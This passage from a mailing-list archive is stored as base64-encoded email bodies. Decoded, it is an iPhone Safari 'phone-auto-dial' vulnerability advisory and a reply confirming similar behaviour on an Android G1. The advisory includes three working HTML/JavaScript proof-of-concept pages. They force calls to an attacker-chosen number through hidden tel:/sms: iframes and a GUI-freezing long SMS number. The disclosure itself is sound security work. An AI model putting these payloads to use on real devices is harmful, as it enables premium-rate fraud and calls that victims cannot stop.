Y2hpZXZlZCB0aHJvdWdoIGxvYWRpbmcgc3BlY2lhbA0KPj4+ICAgVVJMcyB1c2luZyB0aGUgbWV0
YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93biBpbiB0aGUgc2Vjb25kDQo+Pj4gICBwcm9vZi1v
Zi1jb25jZXB0IGV4cGxvaXQgYmVsb3cuDQo+Pj4NCj4+PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0
aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVkIHRocm91Z2ggcG9wdXANCj4+PiAgIHdp
bmRvd3MgKGUuZy4gamF2YXNjcmlwdCBhbGVydCkuIEluIHRoaXMgc2l0dWF0aW9uIHRoZSBpbml0
aWF0aW5nIGFwcA0KPj4+ICAgZG9lcyBub3QgbmVlZCB0byBiZSB0ZXJtaWFudGVkIGluIG9yZGVy
IHRvIGFjdGl2ZSB0aGUgY2FsbC4NCj4+PiAJDQo+Pj4gICBGaW5hbGx5LCB3ZSBkaXNjb3ZlcmVk
IGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0NCj4+PiAgIG1hbGljaW91
cyBwaG9uZSBjYWxscyB0aGF0IGNhbm5vdCBiZSBwcmV2ZW50ZWQgb3IgY2FuY2VsZWQgYnkgdGhl
DQo+Pj4gICB2aWN0aW0uIFRoaXMgYnVnIGFsbG93cyB0aGUgYXR0YWNrZXIgdG8gZnJlZXogdGhl
IEdVSSAoZ3JhcGhpY2FsIHVzZXINCj4+PiAgIGludGVyZmFjZSkgZm9yIGEgbnVtYmVyIG9mIHNl
Y29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+Pj4gICBwcm9ncmVzc2Vz
IGluCXRoZSBiYWNrZ3JvdW5kIGFuZCBjYW5ub3QgYmUgc3RvcHBlZCBieSB0aGUgdmljdGltIHVz
ZXIuDQo+Pj4gICBGcmVlemluZyB0aGUgR1VJIGlzIGFjaGlldmVkIGJ5IHBhc3NpbmcgYSAidmVy
eSBsb25nIiBwaG9uZSBudW1iZXIgdG8NCj4+PiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRoZSBT
TVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+Pj4gICBzdGFydGVkLCBm
cmVlemVzIHRoZSBpUGhvbmUgR1VJLiBBbHNvIHN3aXRjaGluZyBvZmYgdGhlIGlQaG9uZSBjYW5u
b3QNCj4+PiAgIGJlIHBlcmZvcm1lZCBmYXN0IGVub3VnaCBpbiBvcmRlciB0byBwcmV2ZW50IHRo
ZSBtYWxpY2lvdXMgY2FsbC4NCj4+PiAJDQo+Pj4NCj4+PiAgIFsxXSBodHRwOi8vd3d3LnJmYy1l
ZGl0b3Iub3JnL3JmYy9yZmMzOTY2LnR4dA0KPj4+ICAgWzJdIGh0dHA6Ly90b29scy5pZXRmLm9y
Zy9odG1sL2RyYWZ0LWFudHRpLWdzbS1zbXMtdXJsLTA0DQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4gRnVydGhlciBEaXNjdXNzaW9uOg0KPj4+DQo+Pj4g
ICBUaGUgZGlhbGluZyBkaWFsb2cgaXMgY2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRo
ZSB1c2VyLCBpbiBtb3N0DQo+Pj4gICBjYXNlcywgY2FuJ3QgcHJlc3MgY2FuY2VsIHF1aWNrIGVu
b3VnaCBpbiBvcmRlciB0byBzdG9wIHRoZSBpbml0aWF0aW9uDQo+Pj4gICBvZiB0aGUgY2FsbC4g
T25jZSB0aGUgZXh0ZXJuYWwgYXBwbGljYXRpb24gaXMgbGF1bmNoZWQsIHRoZSB0ZWxlcGhvbnkN
Cj4+PiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcgaW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWlu
ZyB0aGUgY2FsbC4gT25seQ0KPj4+ICAgdGhlIGNhbGwgZm9yd2FyZGluZyBkaWFsb2cgKGNvbnRh
aW5pbmcgdGhlICJkaXNtaXNzIiBidXR0b24pIGluZGljYXRlcw0KPj4+ICAgYSBjYWxsIGJlaW5n
IG1hZGUuDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4g
UHJvb2Ytb2YtQ29uY2VwdCB3aXRoIHBsYWluIEhUTUwgdXNpbmcgdGhlIFNNUyBhcHBsaWNhdGlv
bjoNCj4+Pg0KPj4+ICAgPGh0bWw+DQo+Pj4gICA8aGVhZD4NCj4+PiAgIDx0aXRsZT5pUGhvbmUg
U2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29sbGluIE11bGxpbmVyDQo+
Pj4gICA8L3RpdGxlPg0KPj4+ICAgPC9oZWFkPg0KPj4+ICAgPGJvZHk+DQo+Pj4gICA8aWZyYW1l
IHNyYz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPj4+
ICAgPGlmcmFtZSBzcmM9InRlbDorMTQwODk3NDgzODgiIFdJRFRIPTUwIEhFSUdIVD0xMD48L2lm
cmFtZT4NCj4+PiAgIDwhLS0gc2Vjb25kIGlmcmFtZSBpcyB0byBhdHRhY2sgcXVpY2sgdXNlcnMg
d2hvIG1hbmFnZSB0byBjbG9zZSB0aGUNCj4+PiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8t
LT4NCj4+PiAgIDxpZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9
MTA+PC9pZnJhbWU+DQo+Pj4gICA8L2JvZHk+DQo+Pj4gICA8L2h0bWw+DQo+Pj4NCj4+PiBQcm9v
Zi1vZi1Db25jZXB0IHVzaW5nIGphdmFzY3JpcHQgYW5kIHRoZSBNYXBzIGFwcGxpY2F0aW9uOg0K
Pj4+DQo+Pj4gICA8aHRtbD4NCj4+PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZh
cmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAg
IDwvdGl0bGU+DQo+Pj4gICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOw0K
Pj4+ICAgVVJMPWh0dHA6Ly9tYXBzLmdvb2dsZS5kZS9tYXBzP3E9cmhlaW5zdHJhc3NlKzc1K2Rh
cm1zdGFkdCI+DQo+Pj4gICA8L2hlYWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFu
Zz1qYXZhc2NyaXB0Pg0KPj4+ICAgZnVuY3Rpb24gYSgpIHsNCj4+PiAgICBkb2N1bWVudC53cml0
ZSgiPGlmcmFtZSBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgV0lEVEg9NTAgDQo+Pj4gSEVJR0hU
PTEwPjwvaWZyYW1lPiIpOw0KPj4+ICAgfQ0KPj4+ICAgc2V0VGltZW91dCgiYSgpIiwgMTAwKTsN
Cj4+PiAgIDwvc2NyaXB0Pg0KPj4+ICAgPC9ib2R5Pg0KPj4+ICAgPC9odG1sPg0KPj4+IAkNCj4+
PiBQcm9vZi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0
b3AgdGhlIG1hbGljaW91cyANCj4+PiBwaG9uZSBjYWxsOg0KPj4+DQo+Pj4gICA8aHRtbD4NCj4+
PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4
cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAgIDwvdGl0bGU+DQo+Pj4gICA8L2hl
YWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFuZz1qYXZhc2NyaXB0Pg0KPj4+ICAg
bCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0KPj4+ICAgZm9yIChpID0gMDsgaSA8IDEwMDAwOyBp
KyspIHsNCj4+PiAgICAgICAgICAgbCA9IGwgKyAiMzM0MDk0ODAzNDI5ODIzMiI7DQo+Pj4gICB9
DQo+Pj4gICBsID0gbCArICJcIiB3aWR0aD0xMCBoZWlnaHQ9MTA+PC9pZnJhbWU+PGlmcmFtZQ0K
Pj4+ICAgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIGhlaWdodD0xMCB3aWR0aD0xMD48L2lmcmFt
ZT4iOw0KPj4+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+Pj4gICA8L3NjcmlwdD4NCj4+PiAgIDwv
Ym9keT4NCj4+PiAgIDwvaHRtbD4NCj4+Pg0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tDQo+Pj4NCj4+PiBNb3JlIERldGFpbGVkIEluZm9ybWF0aW9uOg0KPj4+DQo+Pj4gIERlbW8g
dmlkZW8gYXZhaWxhYmxlIGF0Og0KPj4+ICAgaHR0cDovL3d3dy5tdWxsaW5lci5vcmcvaXBob25l
Lw0KPj4+DQo+Pj4gIEFkdmlzb3JpZXM6DQo+Pj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9z
ZWN1cml0eS9hZHZpc29yaWVzLw0KPj4+DQo+Pj4gLS0tIEVORCBBRFZJU09SWSAtLS0NCj4+Pg0K
Pj4+DQo+Pj4gLS0gDQo+Pj4gQ29sbGluIFIuIE11bGxpbmVyIDxjb2xsaW5AYmV0YXZlcnNpb24u
bmV0Pg0KPj4+IGluZm8vcGdwOiBmaW5nZXIgY29sbGluQGJldGF2ZXJzaW9uLm5ldA0KPj4+IElm
IEJpbGwgR2F0ZXMgaGFkIGEgbmlja2VsIGZvciBldmVyeSB0aW1lIFdpbmRvd3MgY3Jhc2hlZC4u
LiBPaCB3YWl0LCBoZSANCj4+PiBkb2VzIQ0KPg0KPg0KPi0tIA0KPkNvbGxpbiBSLiBNdWxsaW5l
ciA8Y29sbGluQGJldGF2ZXJzaW9uLm5ldD4NCj5pbmZvL3BncDogZmluZ2VyIGNvbGxpbkBiZXRh
dmVyc2lvbi5uZXQNCj5DIGdpdmVzIHlvdSBlbm91Z2ggcm9wZSB0byBoYW5nIHlvdXJzZWxmLiBD
KysgYWxzbyBnaXZlcyB5b3UgdGhlIHRyZWUgDQo+b2JqZWN0IHRvIHRpZSBpdCB0by4NCg==

------OOQ6QVNMQ89GSPKM03TM81BMDDCI85--



From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 09:14
------OOQR8OIVASFMLRMIKQ9G04MAIHM98G
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

Q29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmluZyBPUyB2ZXJzaW9u
IDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24gZW1haWwgdG8gZGlh
bCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQgdGhlIHN1YmplY3Qg
bGluZSA7KQoKRldJVywgaXQgZGlkbid0IGFjdHVhbGx5IGRpYWwsIGp1c3QgbG9hZGVkIHRoZSBk
aWFsZXIgd2l0aCB0aGF0IG51bWJlciByZWFkeS4gIAoKTG9va3MgbGlrZSB0aGlzIGlzIGEgV2Vi
a2l0IGJ1Zywgbm90IFNhZmFyaS4gCgpDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lv
bi5uZXQ+IHdyb3RlOgoKPlJlbGVhc2VkIHNpbmNlIEFwcGxlIHB1Ymxpc2hlZCB0aGUgaVBob25l
IDMuMCBzZWN1cml0eSBmaXhlcy4NCj4NCj5WdWxuZXJhYmlsaXR5IFJlcG9ydA0KPg0KPi0tLSBC
RUdJTiBBRFZJU09SWSAtLS0NCj4NCj5NYW51ZmFjdHVyZXI6IEFwcGxlICh3d3cuYXBwbGUuY29t
KQ0KPkRldmljZTogICAgICAgaVBob25lIDNHIChpUGhvbmUgMXN0IEdlbikNCj5GaXJtd2FyZTog
ICAgIDIuMSAocG9zc2libGUgZWFybGllciB2ZXJzaW9ucykNCj5EZXZpY2UgVHlwZTogIHNtYXJ0
IHBob25lDQo+DQo+U3Vic3lzdGVtczogU2FmYXJpIChhbmQgbW9iaWxlIHRlbGVwaG9ueSkNCj4N
Cj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlNob3J0IG5hbWU6DQo+ICAgaVBo
b25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgKHZ1bG5lcmFiaWxpdHkpDQo+DQo+VnVsbmVyYWJp
bGl0eSBjbGFzczoNCj4gICBhcHBsaWNhdGlvbiBsb2dpYyBidWcNCj4NCj5FeGVjdXRpdmUgU3Vt
bWFyeToNCj4gICBBIG1hbGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwg
d2l0aG91dCB0aGUgbmVlZCBvZiB1c2VyDQo+ICAgaW50ZXJhY3Rpb24uIFRoZSBkZXN0aW5hdGlv
biBwaG9uZSBudW1iZXIgaXMgY2hvc2VuIGJ5IHRoZSBhdHRhY2tlci4NCj4NCj5SaXNrOiBNRURJ
VU0tSElHSA0KPiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBv
ZiBmaW5hbmNpYWwgZ2FpbiB0aHJvdWdoDQo+ICAgdGhpcyBhdHRhY2sgYnkgY2FsbGluZyBvZiBw
cmVtaXVtIHJhdGUgbnVtYmVycyAoZS5nLiAxLTkwMCBpbiB0aGUNCj4gICBVLlMuKS4gRGVuaWFs
LW9mLXNlcnZpY2UgYWdhaW5zdCBhcmJpdHJhcnkgcGhvbmUgbnVtYmVycyB0aHJvdWdoDQo+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4NCj4tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlJlcG9ydGVyOiBDb2xsaW4gTXVsbGluZXIgPGNvbGxp
bltBVF1tdWxsaW5lci5vcmc+DQo+DQo+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4N
Cj5BZmZpbGlhdGlvbjogTVVsbGlORVIuT1JHIC8gdGhlIHRyaWZpbml0ZSBncm91cCAvIChGcmF1
bmhvZmVyIFNJVCkNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlRpbWUg
bGluZToNCj4NCj4gICBPY3QuIDIwLiAyMDA4OiBSZXBvcnRlZCB2dWxuZXJhYmlsaXR5IHRvIHZl
bmRvci4NCj4gICBPY3QuIDIwLiAyMDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBv
dXIgZW1haWwuDQo+ICAgICAgICAgICAgICAgICAgTm90IGNvbW1lbnRpbmcgb24gdGhlIHZ1bG5l
cmFiaWxpdHkgaXRzZWxmLg0KPiAgIE9jdC4gMjcuIDIwMDg6IFNlbnQgdXBkYXRlIHRvIHZlbmRv
ciwgYWxzbyByZXF1ZXN0aW5nIGEgc3RhdHVzIHJlcG9ydC4NCj4gICBPY3QuIDI5LiAyMDA4OiBS
ZXBseSBmcm9tIHZlbmRvciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPiAgIE9j
dC4gMzAuIDIwMDg6IFNlbnQgYWRkaXRpb25hbCBpbmZvcm1hdGlvbi4NCj4gICBOb3YuIDEzLiAy
MDA4OiBWZW5kZXIgc2F5cyB2dWxuZXJhYmlsaXR5IGlzIGZpeGVkIGluIHVwY29taW5nIE9TDQo+
ICAgICAgICAgICAgICAgICAgdmVyc2lvbi4NCj4gICBOb3YuIDIwLiAyMDA4OiBQdWJsaWMgZGlz
Y2xvc3VyZS4NCj4gICBKdW4uIDE4LiAyMDA5OiBGdWxsLURpc2Nsb3N1cmUuDQo+DQo+LS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5GaXg6DQo+DQo+ICAgaVBob25lIE9TIDIuMg0K
PiAgIGlQaG9uZSBPUyAyLjIuMQ0KPiAgIGlQaG9uZSBPUyAzLjANCj4JDQo+LS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5UZWNobmljYWwgRGV0YWlsczoNCj4NCj4gICBUaGUgU2Fm
YXJpIHZlcnNpb24gcnVubmluZyBvbiB0aGUgaVBob25lIHN1cHBvcnRzIGhhbmRsaW5nIHRoZSBU
RUwgWzFdDQo+ICAgcHJvdG9jb2wgdGhyb3VnaCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFs
ZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4gICBkb25lIGJ5IHBhc3NpbmcgdGhlIHByb3ZpZGVk
IHBob25lIG51bWJlciB0byB0aGUgdGVsZXBob255DQo+ICAgYXBwbGljYXRpb24uIFVuZGVyIG5v
cm1hbCBjb25kaXRpb25zLCBsb2FkaW5nIGEgdGVsOiBVUkkgcmVzdWx0cyBpbiBhDQo+ICAgbWVz
c2FnZSBib3ggYXNraW5nIHRoZSB1c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBu
dW1iZXIuIFRoZQ0KPiAgIHVzZXIgaXMgcHJlc2VudGVkIHdpdGggdGhlIHNpbXBsZSBjaG9pY2Ug
dG8gZWl0aGVyIHByZXNzIGNhbGwgb3INCj4gICBjYW5jZWwuDQo+DQo+ICAgQSBURUwgVVJJIGNh
biBiZSBvcGVuZWQgYXV0b21hdGljYWxseSBpZiB0aGUgVEVMIFVSSSBpcyB1c2VkIGFzIHRoZQ0K
PiAgIHNvdXJjZSBvZiBhbiBIVE1MIGlmcmFtZSBvciBmcmFtZSwgYXMgdGhlIFVSTCBvZiBhIG1l
dGEgcmVmcmVzaCwgYXMNCj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwg
YW5kIGFzIHRoZSBsb2NhdGlvbiBvZiB0aGUNCj4gICBjdXJyZW50IG9yIGEgbmV3IHdpbmRvdyB1
c2luZyBqYXZhc2NyaXB0Lg0KPg0KPiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJh
YmlsaXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPiAgIHBlcm1pc3Npb24gdG8gY2Fs
bCIgZGlhbG9nIGluIGEgd2F5IHRoYXQgY2hvb3NlcyB0aGUgImNhbGwiIG9wdGlvbg0KPiAgIHJh
dGhlciB0aGFuIHRoZSAiY2FuY2VsIiBvcHRpb24uDQo+CQ0KPiAgIFRoaXMgY29uZGl0aW9uIG9j
Y3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4gICBTYWZh
cmkgaXMgY2xvc2VkIGJ5IGxhdW5jaGluZyBhbiBleHRlcm5hbCBhcHBsaWNhdGlvbiwgZm9yIGV4
YW1wbGUNCj4gICBsYXVuY2hpbmcgdGhlIFNNUyBhcHBsaWNhdGlvbiAoaW4gb3JkZXIgdG8gaGFu
ZGxlIGEgU01TIFVSSSBbMl0pLiBUaGUNCj4gICBTTVMgYXBwbGljYXRpb24gY2FuIGJlIGxhdW5j
aGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+ICAgc291cmNlIG9mIGFuIGlm
cmFtZS4gVGhpcyBpcyBzaG93biBpbiB0aGUgZmlyc3QgcHJvb2Ytb2YtY29uY2VwdA0KPiAgIGV4
cGxvaXQgYmVsb3cuDQo+CQ0KPiAgIEZ1cnRoZXIgaW52ZXN0aWdhdGlvbiBzaG93ZWQgdGhhdCB0
aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+ICAgbGF1bmNoaW5nIG90aGVyIGFw
cGxpY2F0aW9ucyBzdWNoIGFzOiBNYXBzLCBZb3VUdWJlLCBhbmQgaVR1bmVzLg0KPiAgIExhdW5j
aGluZyB0aGVzZSBhcHBsaWNhdGlvbnMgY2FuIGJlIGFjaGlldmVkIHRocm91Z2ggbG9hZGluZyBz
cGVjaWFsDQo+ICAgVVJMcyB1c2luZyB0aGUgbWV0YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93
biBpbiB0aGUgc2Vjb25kDQo+ICAgcHJvb2Ytb2YtY29uY2VwdCBleHBsb2l0IGJlbG93Lg0KPg0K
PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVk
IHRocm91Z2ggcG9wdXANCj4gICB3aW5kb3dzIChlLmcuIGphdmFzY3JpcHQgYWxlcnQpLiBJbiB0
aGlzIHNpdHVhdGlvbiB0aGUgaW5pdGlhdGluZyBhcHANCj4gICBkb2VzIG5vdCBuZWVkIHRvIGJl
IHRlcm1pYW50ZWQgaW4gb3JkZXIgdG8gYWN0aXZlIHRoZSBjYWxsLg0KPgkNCj4gICBGaW5hbGx5
LCB3ZSBkaXNjb3ZlcmVkIGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0N
Cj4gICBtYWxpY2lvdXMgcGhvbmUgY2FsbHMgdGhhdCBjYW5ub3QgYmUgcHJldmVudGVkIG9yIGNh
bmNlbGVkIGJ5IHRoZQ0KPiAgIHZpY3RpbS4gVGhpcyBidWcgYWxsb3dzIHRoZSBhdHRhY2tlciB0
byBmcmVleiB0aGUgR1VJIChncmFwaGljYWwgdXNlcg0KPiAgIGludGVyZmFjZSkgZm9yIGEgbnVt
YmVyIG9mIHNlY29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+ICAgcHJv
Z3Jlc3NlcyBpbgl0aGUgYmFja2dyb3VuZCBhbmQgY2Fubm90IGJlIHN0b3BwZWQgYnkgdGhlIHZp
Y3RpbSB1c2VyLg0KPiAgIEZyZWV6aW5nIHRoZSBHVUkgaXMgYWNoaWV2ZWQgYnkgcGFzc2luZyBh
ICJ2ZXJ5IGxvbmciIHBob25lIG51bWJlciB0bw0KPiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRo
ZSBTTVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+ICAgc3RhcnRlZCwg
ZnJlZXplcyB0aGUgaVBob25lIEdVSS4gQWxzbyBzd2l0Y2hpbmcgb2ZmIHRoZSBpUGhvbmUgY2Fu
bm90DQo+ICAgYmUgcGVyZm9ybWVkIGZhc3QgZW5vdWdoIGluIG9yZGVyIHRvIHByZXZlbnQgdGhl
IG1hbGljaW91cyBjYWxsLg0KPgkNCj4NCj4gICBbMV0gaHR0cDovL3d3dy5yZmMtZWRpdG9yLm9y
Zy9yZmMvcmZjMzk2Ni50eHQNCj4gICBbMl0gaHR0cDovL3Rvb2xzLmlldGYub3JnL2h0bWwvZHJh
ZnQtYW50dGktZ3NtLXNtcy11cmwtMDQNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0KPg0KPkZ1cnRoZXIgRGlzY3Vzc2lvbjoNCj4NCj4gICBUaGUgZGlhbGluZyBkaWFsb2cgaXMg
Y2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRoZSB1c2VyLCBpbiBtb3N0DQo+ICAgY2Fz
ZXMsIGNhbid0IHByZXNzIGNhbmNlbCBxdWljayBlbm91Z2ggaW4gb3JkZXIgdG8gc3RvcCB0aGUg
aW5pdGlhdGlvbg0KPiAgIG9mIHRoZSBjYWxsLiBPbmNlIHRoZSBleHRlcm5hbCBhcHBsaWNhdGlv
biBpcyBsYXVuY2hlZCwgdGhlIHRlbGVwaG9ueQ0KPiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcg
aW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWluZyB0aGUgY2FsbC4gT25seQ0KPiAgIHRoZSBjYWxs
IGZvcndhcmRpbmcgZGlhbG9nIChjb250YWluaW5nIHRoZSAiZGlzbWlzcyIgYnV0dG9uKSBpbmRp
Y2F0ZXMNCj4gICBhIGNhbGwgYmVpbmcgbWFkZS4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KPg0KPlByb29mLW9mLUNvbmNlcHQgd2l0aCBwbGFpbiBIVE1MIHVzaW5nIHRoZSBT
TVMgYXBwbGljYXRpb246DQo+DQo+ICAgPGh0bWw+DQo+ICAgPGhlYWQ+DQo+ICAgPHRpdGxlPmlQ
aG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGlu
ZXINCj4gICA8L3RpdGxlPg0KPiAgIDwvaGVhZD4NCj4gICA8Ym9keT4NCj4gICA8aWZyYW1lIHNy
Yz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPiAgIDxp
ZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9MTA+PC9pZnJhbWU+
DQo+ICAgPCEtLSBzZWNvbmQgaWZyYW1lIGlzIHRvIGF0dGFjayBxdWljayB1c2VycyB3aG8gbWFu
YWdlIHRvIGNsb3NlIHRoZQ0KPiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8tLT4NCj4gICA8
aWZyYW1lIHNyYz0idGVsOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1l
Pg0KPiAgIDwvYm9keT4NCj4gICA8L2h0bWw+DQo+DQo+UHJvb2Ytb2YtQ29uY2VwdCB1c2luZyBq
YXZhc2NyaXB0IGFuZCB0aGUgTWFwcyBhcHBsaWNhdGlvbjoNCj4NCj4gICA8aHRtbD4NCj4gICA8
aGVhZD4NCj4gICA8dGl0bGU+aVBob25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgRXhwbG9pdCBE
ZW1vIGJ5IENvbGxpbiBNdWxsaW5lcg0KPiAgIDwvdGl0bGU+DQo+ICAgPG1ldGEgaHR0cC1lcXVp
dj0icmVmcmVzaCIgY29udGVudD0iMDsNCj4gICBVUkw9aHR0cDovL21hcHMuZ29vZ2xlLmRlL21h
cHM/cT1yaGVpbnN0cmFzc2UrNzUrZGFybXN0YWR0Ij4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+
DQo+ICAgPHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgZnVuY3Rpb24gYSgpIHsNCj4gICAg
ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIFdJRFRIPTUw
IA0KPkhFSUdIVD0xMD48L2lmcmFtZT4iKTsNCj4gICB9DQo+ICAgc2V0VGltZW91dCgiYSgpIiwg
MTAwKTsNCj4gICA8L3NjcmlwdD4NCj4gICA8L2JvZHk+DQo+ICAgPC9odG1sPg0KPgkNCj5Qcm9v
Zi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0b3AgdGhl
IG1hbGljaW91cyANCj5waG9uZSBjYWxsOg0KPg0KPiAgIDxodG1sPg0KPiAgIDxoZWFkPg0KPiAg
IDx0aXRsZT5pUGhvbmUgU2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29s
bGluIE11bGxpbmVyDQo+ICAgPC90aXRsZT4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+DQo+ICAg
PHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgbCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0K
PiAgIGZvciAoaSA9IDA7IGkgPCAxMDAwMDsgaSsrKSB7DQo+ICAgICAgICAgICBsID0gbCArICIz
MzQwOTQ4MDM0Mjk4MjMyIjsNCj4gICB9DQo+ICAgbCA9IGwgKyAiXCIgd2lkdGg9MTAgaGVpZ2h0
PTEwPjwvaWZyYW1lPjxpZnJhbWUNCj4gICBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgaGVpZ2h0
PTEwIHdpZHRoPTEwPjwvaWZyYW1lPiI7DQo+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+ICAgPC9z
Y3JpcHQ+DQo+ICAgPC9ib2R5Pg0KPiAgIDwvaHRtbD4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KPg0KPk1vcmUgRGV0YWlsZWQgSW5mb3JtYXRpb246DQo+DQo+ICBEZW1vIHZp
ZGVvIGF2YWlsYWJsZSBhdDoNCj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9pcGhvbmUvDQo+
